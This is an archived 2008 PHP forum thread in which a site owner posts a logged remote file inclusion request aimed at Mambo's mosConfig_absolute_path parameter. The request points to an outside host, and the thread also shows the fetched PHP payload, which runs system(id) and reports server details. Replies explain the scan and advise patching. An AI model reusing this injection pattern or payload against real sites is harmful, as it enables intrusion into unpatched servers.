n8w Posted June 18, 2008 Share Posted June 18, 2008 Here is a 404 i received Page Requested: www.n8w.com//pear/PEAR/Frontend/CLI.php.php?mosConfig_absolute_path=http://web2.mars52.plusserver.de/contenido44/kurz/js/helpid.txt??? When I checked out the page it has this ... what is the hacker actually trying to do? <?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "0sirys was here ..<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit; Link to comment https://forums.phpfreaks.com/topic/110759-hacker/ Share on other sites More sharing options...
Jabop Posted June 18, 2008 Share Posted June 18, 2008 People try to do these types of 'hacks' a lot. A lot of CMS have had exploits that script kiddies think they can exploit, but have been fixed. I don't think it's something you should worry about. Link to comment https://forums.phpfreaks.com/topic/110759-hacker/#findComment-568214 Share on other sites More sharing options...
rarebit Posted June 18, 2008 Share Posted June 18, 2008 after putting the var into google and php.net, it turns out to be something to do with the mambo cms, see http://www.google.co.uk/search?q=mosConfig_absolute_path&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a when an exploit like this is made known hackers will fire it at many sites just in-case they use the specified software and have the un-patched version... Link to comment https://forums.phpfreaks.com/topic/110759-hacker/#findComment-568222 Share on other sites More sharing options...
n8w Posted June 18, 2008 Author Share Posted June 18, 2008 ahh ... what is the best way to avoid hacks? my site recently was hacked to pieces ... I am working on a sanitizing function and magic_quotes for sql injection .. but I am wondering if I should use something like http://htmlpurifier.org/comparison.html or if that is overkill? cause ideally I would like to avoid using 3rd party stuff Link to comment https://forums.phpfreaks.com/topic/110759-hacker/#findComment-568225 Share on other sites More sharing options...
rarebit Posted June 18, 2008 Share Posted June 18, 2008 it all depends upon what your site does... Link to comment https://forums.phpfreaks.com/topic/110759-hacker/#findComment-568230 Share on other sites More sharing options...
n8w Posted June 18, 2008 Author Share Posted June 18, 2008 well ...it mainly serves as a link portal with a searchable database and a way to upload images Link to comment https://forums.phpfreaks.com/topic/110759-hacker/#findComment-568247 Share on other sites More sharing options...
Jabop Posted June 18, 2008 Share Posted June 18, 2008 ahh ... what is the best way to avoid hacks? Keep your software up to date. That's all. Link to comment https://forums.phpfreaks.com/topic/110759-hacker/#findComment-568251 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.